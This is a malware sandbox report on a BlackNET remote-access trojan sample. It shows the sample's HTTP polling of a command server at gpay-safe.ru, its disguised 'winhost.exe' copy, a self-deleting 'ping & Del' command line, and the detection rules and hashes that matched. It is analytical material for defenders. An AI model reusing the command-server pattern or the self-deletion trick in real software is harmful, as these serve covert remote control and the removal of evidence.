                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:35.487190008 CEST1347OUTGET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:35.589535952 CEST1347INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:35 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Code Manipulations

                                          Statistics

                                          CPU Usage


                                          Memory Usage


                                          High Level Behavior Distribution


                                          Behavior


                                          System Behavior

                                          General

                                          Start time:00:49:01
                                          Start date:25/08/2021
                                          Path:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x9b0000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000000.00000000.641714732.00000000009B2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:00:49:10
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:49:10
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:49:11
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:00:49:11
                                          Start date:25/08/2021
                                          Path:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x720000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000008.00000000.662483550.0000000000722000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: SUSP_Modified_SystemExeFileName_in_File, Description: Detects a variant of a system file name often used by attackers to cloak their activity, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: HKTL_NET_GUID_BlackNET, Description: Detects VB.NET red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Arnim Rupp
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 56%, Metadefender, Browse
                                          • Detection: 85%, ReversingLabs
                                          Reputation:low

                                          General

                                          Start time:00:49:15
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:49:15
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:49:16
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:00:49:21
                                          Start date:25/08/2021
                                          Path:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x810000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 0000000C.00000000.685235797.0000000000812000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 0000000C.00000002.701069218.0000000002FF9000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:00:49:25
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:49:25
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:00:49:26
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:00:49:26
                                          Start date:25/08/2021
                                          Path:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0xae0000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000010.00000002.704585116.0000000000AE2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, Author: Joe Security

                                          General

                                          Start time:00:49:29
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:00:49:30
                                          Start date:25/08/2021
                                          Path:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x160000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000013.00000000.702548185.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp, Author: Joe Security

                                          General

                                          Start time:00:49:30
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:00:49:30
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:00:49:34
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:00:49:35
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:00:49:36
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Disassembly

                                          Code Analysis


                                            Executed Functions

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: s5$ s5$ s5$8.5
                                            • API String ID: 0-2748289946
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: h|5$|5
                                            • API String ID: 0-2177373217
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: X|5
                                            • API String ID: 0-721148514
                                            • Opcode ID: ad21b15fd3ce396eda983fb6fe4a630e211ebb54327159d82a019c2e6f260cab
                                            • Instruction ID: 74747e503c35c44e12b982ae793863266f60ec2b527ebec4178f233d3a24bc39
                                            • Opcode Fuzzy Hash: ad21b15fd3ce396eda983fb6fe4a630e211ebb54327159d82a019c2e6f260cab
                                            • Instruction Fuzzy Hash: F252D520A1CA8B4FEB69BB2C98957F93BD1EF4A700F5480BDE44EC71C7DD29A9019710
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: H
                                            • API String ID: 0-2852464175
                                            • Opcode ID: 01684b15a97109f48b6a172247035bca08272688d4b9cc21d4659f7afc1aacc0
                                            • Instruction ID: 984e187831b78c9c8ab95e278b85859803f0ce20c25fe31d363e4467ae5ab8d3
                                            • Opcode Fuzzy Hash: 01684b15a97109f48b6a172247035bca08272688d4b9cc21d4659f7afc1aacc0
                                            • Instruction Fuzzy Hash: 60416230A19A498FDF94EB3CC456A69B7E1FF5A314B5484FCE40ECB292DE28E900C741
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a8dcf0fdcfe3897030457e8b00240fac41265db4df71a66685b74c746d9af1a
                                            • Instruction ID: 10f49ad1c631a48136330e6d1d3a9d3964251b724362b4df36628a4de5f9f58c
                                            • Opcode Fuzzy Hash: 0a8dcf0fdcfe3897030457e8b00240fac41265db4df71a66685b74c746d9af1a
                                            • Instruction Fuzzy Hash: 5CA10870518A8D8FEBA4EF18C895AE97BE0FF59704F44817AE80DC7192DF35A845CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb2ea9f5068e79994a1ee1899414410f6939ccebdd53369fac776e2f4644f585
                                            • Instruction ID: 8d06287ffbe28814a7774e1255df90e9529f70deeec7e524267c63e46ca56abc
                                            • Opcode Fuzzy Hash: cb2ea9f5068e79994a1ee1899414410f6939ccebdd53369fac776e2f4644f585
                                            • Instruction Fuzzy Hash: 03811620A0CB894FE7599B2C98127A93FD1EF4B700F6480BAE44DC72D3CD28AD058796
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca34161b0bec0db02a307ea3f2910cb90cd0df88af93cd9ef586d66a908d5831
                                            • Instruction ID: fb44e59f795d05485a00b351eefc61332720b7daca45eb755fcd2d55b13d7792
                                            • Opcode Fuzzy Hash: ca34161b0bec0db02a307ea3f2910cb90cd0df88af93cd9ef586d66a908d5831
                                            • Instruction Fuzzy Hash: 2E913A70518A4D9FEBA4EF18C899BE93BE0FF59354F948179E80DC7292DE359884CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dd3a434c6a35728a28822d9bf98b07d8d78be908ec810a8d073ca5e639104b9
                                            • Instruction ID: 61c98a65ceaeda4353baea788fa5f0e7f12e4bfe920c803edd35720cf662c698
                                            • Opcode Fuzzy Hash: 1dd3a434c6a35728a28822d9bf98b07d8d78be908ec810a8d073ca5e639104b9
                                            • Instruction Fuzzy Hash: 52817F70518A4D8FDBA8EF18DC86BE937E1FB59300F50816AE84DC7252DF35AA45CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3119bcc668ebe8b39fa432186888e7bf60c8108d6dc83bc54d03e8e4ae5b582b
                                            • Instruction ID: ff149aaf4bf68123900aa0fc419f0d3492a70fc7b003111c39c5147452e8c865
                                            • Opcode Fuzzy Hash: 3119bcc668ebe8b39fa432186888e7bf60c8108d6dc83bc54d03e8e4ae5b582b
                                            • Instruction Fuzzy Hash: 8D71F030718A494FEB95EB2C889977D77E2EFDA300F5981B5D00DC7297CF6898458742
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 36d8dcf3b4e9ea87208e47b019cbb5c6a42c4578689389727738e1a2b199310a
                                            • Instruction ID: b13374eb482d7ccea4260d5c4355e4bbafea0e05c03f61d79729d256753dc134
                                            • Opcode Fuzzy Hash: 36d8dcf3b4e9ea87208e47b019cbb5c6a42c4578689389727738e1a2b199310a
                                            • Instruction Fuzzy Hash: 7B61B160A0DB8A4FEB569B2848553A93FE1EF47300F5480FEE88EC71D3DE28A9059351
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0f8464bb1284ead4d138b2db237c4484ecfbcebed1e76a4df9abf40d67a3c22
                                            • Instruction ID: ee3a8be7d03204976c1f8ed853586e1398f4d169821b652d6a022e550a5053f2
                                            • Opcode Fuzzy Hash: c0f8464bb1284ead4d138b2db237c4484ecfbcebed1e76a4df9abf40d67a3c22
                                            • Instruction Fuzzy Hash: AE81A570918A8E9FEBA0DF28C8857E93BE0FF19744F504175E84DC7292DE35A981DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcb1342b48016cc75e522cb940359f3377efa858cc4ac3cfe26584c87e9ca2f3
                                            • Instruction ID: 5b0857c922e8217a23c260f66b13b97a28e6e18dcb850ad22324de1a9e57741a
                                            • Opcode Fuzzy Hash: bcb1342b48016cc75e522cb940359f3377efa858cc4ac3cfe26584c87e9ca2f3
                                            • Instruction Fuzzy Hash: 2051B12471CA5A5FEBA5EB788C997B937D1EF5B201F0480F9E80EC7193DD189C418361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0482b6faa3a9aea50d026052337fc601e64dfdf8275c82d97eafc0456eac5d77
                                            • Instruction ID: 5088203fa64488921a7ae68f0e761abd4ae2da81163836638b5a850f45d32218
                                            • Opcode Fuzzy Hash: 0482b6faa3a9aea50d026052337fc601e64dfdf8275c82d97eafc0456eac5d77
                                            • Instruction Fuzzy Hash: 4351A071508B8D8FEBA4DF18C885BE97BE1FB19310F50816AE44DC7292DF34A649CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d73127bc255873f49a5d3983e0936b4f21e0df6399fa61dffa83b4a54fb06a6
                                            • Instruction ID: 7783920aac7e76ad85f53631be76d55ccb844cc323ecb26721cb9e13627700db
                                            • Opcode Fuzzy Hash: 7d73127bc255873f49a5d3983e0936b4f21e0df6399fa61dffa83b4a54fb06a6
                                            • Instruction Fuzzy Hash: 8F51C161A0D78A8FEB569B2C88957A87FE0EF4B240F5480FAD04DCB293DE289D048351
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a47d236af197a35038990bd6d85c6dcc6b084ec55df8f7a010536fb94fc6763
                                            • Instruction ID: 311ffd16a394a722242c3f41384da0e47d0cd462ac68707f038698fb7e2923cc
                                            • Opcode Fuzzy Hash: 0a47d236af197a35038990bd6d85c6dcc6b084ec55df8f7a010536fb94fc6763
                                            • Instruction Fuzzy Hash: 6841C310B1CB8A2FEB56F37848997A97BD2EF5B300F4580F5D40DC7293DD28A8018751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678580002.00007FFA35E6A000.00000040.00000001.sdmp, Offset: 00007FFA35E6A000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96b7d268357d5856787344f45ef2908214ca6ee03a1612e7360349df3baf8edf
                                            • Instruction ID: d9b8569d5eece95b9b5431c67fbd11665d8213c756114ee669d7232e268b5355
                                            • Opcode Fuzzy Hash: 96b7d268357d5856787344f45ef2908214ca6ee03a1612e7360349df3baf8edf
                                            • Instruction Fuzzy Hash: 1641037190CB859FE7668F289846A527FF0FF52310F1501DFD488C71A3E725A845C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: efcc9f68ace76a4b4fad4a81e0d8e531d897084fd9d8d86e127284889c6ba77d
                                            • Instruction ID: 435f9bff39b37d1646716935f80e38016e04fbbaea80be443b7876f93fe556ce
                                            • Opcode Fuzzy Hash: efcc9f68ace76a4b4fad4a81e0d8e531d897084fd9d8d86e127284889c6ba77d
                                            • Instruction Fuzzy Hash: 5731D420A1D68A9FEB969B2C88507793BE1EF47300F6481FAE44ECB1D3CE295905D351
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ce964cbed070c80c1c241c2231309c61efd33809c2cb2f3998cadf7b2689eae
                                            • Instruction ID: c5824bd46dcfa9a1c15a87b355d837b3c3d53b7ce2a77c053a63d24e48db93f7
                                            • Opcode Fuzzy Hash: 7ce964cbed070c80c1c241c2231309c61efd33809c2cb2f3998cadf7b2689eae
                                            • Instruction Fuzzy Hash: BA312A6090CA4F8FE755AB2888456F97BD0EF9B710F4485BAE04DC7093DE39A800D7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df745588cf0f53c3ef2c3dfea62028817527592f4959e8a674fece34a560ff1b
                                            • Instruction ID: 5d8299e225d3e5dfdb7977c7315505d803f921199630ee2f62790a628ab71f07
                                            • Opcode Fuzzy Hash: df745588cf0f53c3ef2c3dfea62028817527592f4959e8a674fece34a560ff1b
                                            • Instruction Fuzzy Hash: 5631C971B08B4E8FE7549B2C88856B937E1EF9A711F4480BAF40DC7293DE299C098791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d47f4102983ed5cd2ad8404e05aac7223e9950ea6881cbc6675347f0061b7158
                                            • Instruction ID: 0a075e870eceb38650bdf120f2af9f33939dc97930391738bd742ff9925db301
                                            • Opcode Fuzzy Hash: d47f4102983ed5cd2ad8404e05aac7223e9950ea6881cbc6675347f0061b7158
                                            • Instruction Fuzzy Hash: 8731C561708F4A8FDBA1EB6C88997783BE1EFAE701B5480FAD44DC7253CE24AC458741
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a0bbd68b5a1fd3bd1e959a04af197bd7ba67885946646f8d485368c9ca2b214
                                            • Instruction ID: 383b57e880622b6ac0239313ca241c2e21a9a99317d2f1475b3e706106a302d5
